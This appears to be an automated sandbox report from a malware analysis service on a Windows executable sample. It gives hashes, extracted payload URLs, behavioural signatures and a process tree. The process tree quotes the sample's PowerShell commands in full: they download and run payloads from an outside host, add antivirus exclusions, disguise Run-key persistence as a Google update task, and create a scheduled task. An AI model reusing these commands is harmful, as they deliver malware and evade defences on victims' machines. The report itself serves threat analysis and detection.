Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
64s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
14/09/2022, 07:17
Static task
static1
Behavioral task
behavioral1
Sample
d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
Resource
win10v2004-20220812-en
General
-
Target
d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
-
Size
43KB
-
MD5
d26c5ebd1d7fb1d5b8f8ef313d408b3a
-
SHA1
1a2386f8d8e5f64eaf404e74c97ed94dc50627c7
-
SHA256
c4ac79bf17fc00f26e2acdeeb0466da96ed9b928df1dd99b8c865a872bb2143d
-
SHA512
dcdb0c5b3128379974ed1604d9196a486c7610867a29b6d985e9baf37485eb96397ce96ff8bd15490e93d6135afa5ca17136bfaa25892a17d4919fded8897fc9
-
SSDEEP
768:Z84x3tuZYVP1stOVTBdlDR0YIWEj+JtrU0bLekwijxBY1SVvKnxKcS8bgGbaG6gk:Vx3VVVzd7Ej+7tbLek7jxG1SVSnccS8a
Malware Config
Extracted
http://cothdesigns2.com:443/obieznne.msi
Extracted
http://cothdesigns2.com:443/H2022_Tool.msi
Extracted
http://cothdesigns2.com:443/cmd.msi
http://cothdesigns2.com:443/xmlo.msi
Signatures
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe" reg.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 11 1064 powershell.exe 12 692 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe" reg.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 1232 1752 WerFault.exe 26 -
Modifies registry key 1 TTPs 2 IoCs
pid Process 268 reg.exe 1568 reg.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe 856 powershell.exe 692 powershell.exe 968 powershell.exe 108 powershell.exe 1064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe Token: SeDebugPrivilege 856 powershell.exe Token: SeDebugPrivilege 692 powershell.exe Token: SeDebugPrivilege 968 powershell.exe Token: SeDebugPrivilege 108 powershell.exe Token: SeDebugPrivilege 1064 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1752 wrote to memory of 1232 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe 41 PID 1752 wrote to memory of 1232 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe 41 PID 1752 wrote to memory of 1232 1752 d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe 41 PID 968 wrote to memory of 1304 968 powershell.exe 43 PID 108 wrote to memory of 1868 108 powershell.exe 42 PID 968 wrote to memory of 1304 968 powershell.exe 43 PID 968 wrote to memory of 1304 968 powershell.exe 43 PID 108 wrote to memory of 1868 108 powershell.exe 42 PID 108 wrote to memory of 1868 108 powershell.exe 42 PID 1868 wrote to memory of 520 1868 cmd.exe 44 PID 1868 wrote to memory of 520 1868 cmd.exe 44 PID 1868 wrote to memory of 520 1868 cmd.exe 44 PID 1304 wrote to memory of 268 1304 cmd.exe 45 PID 1304 wrote to memory of 268 1304 cmd.exe 45 PID 1304 wrote to memory of 268 1304 cmd.exe 45 PID 968 wrote to memory of 972 968 powershell.exe 46 PID 968 wrote to memory of 972 968 powershell.exe 46 PID 968 wrote to memory of 972 968 powershell.exe 46 PID 972 wrote to memory of 1568 972 cmd.exe 47 PID 972 wrote to memory of 1568 972 cmd.exe 47 PID 972 wrote to memory of 1568 972 cmd.exe 47 PID 108 wrote to memory of 2024 108 powershell.exe 48 PID 108 wrote to memory of 2024 108 powershell.exe 48 PID 108 wrote to memory of 2024 108 powershell.exe 48 PID 2024 wrote to memory of 1892 2024 cmd.exe 49 PID 2024 wrote to memory of 1892 2024 cmd.exe 49 PID 2024 wrote to memory of 1892 2024 cmd.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe"C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1752 -s 12002⤵
- Program crash
PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=21⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:108 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.82⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\netsh.exenetsh interface ipv4 set dns name=Local Area Connection static 8.8.8.83⤵PID:520
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=22⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\netsh.exenetsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=23⤵PID:1892
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'powershell.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\system32\reg.exereg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe3⤵
- Adds Run key to start application
- Modifies registry key
PID:268
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe2⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe3⤵
- Adds policy Run key to start application
- Modifies registry key
PID:1568
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/H2022_Tool.msi','C:\Windows\Temp\H2022_Tool.exe');C:\Windows\Temp\H2022_Tool.exe1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"1⤵PID:2008
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51fd0bfe7b147ca1730ba6b85f9f7a554
SHA1576bf591e3864cc49e4cad0bfda87ff0efb01b93
SHA2569662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb
SHA512bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51fd0bfe7b147ca1730ba6b85f9f7a554
SHA1576bf591e3864cc49e4cad0bfda87ff0efb01b93
SHA2569662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb
SHA512bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51fd0bfe7b147ca1730ba6b85f9f7a554
SHA1576bf591e3864cc49e4cad0bfda87ff0efb01b93
SHA2569662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb
SHA512bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51fd0bfe7b147ca1730ba6b85f9f7a554
SHA1576bf591e3864cc49e4cad0bfda87ff0efb01b93
SHA2569662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb
SHA512bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0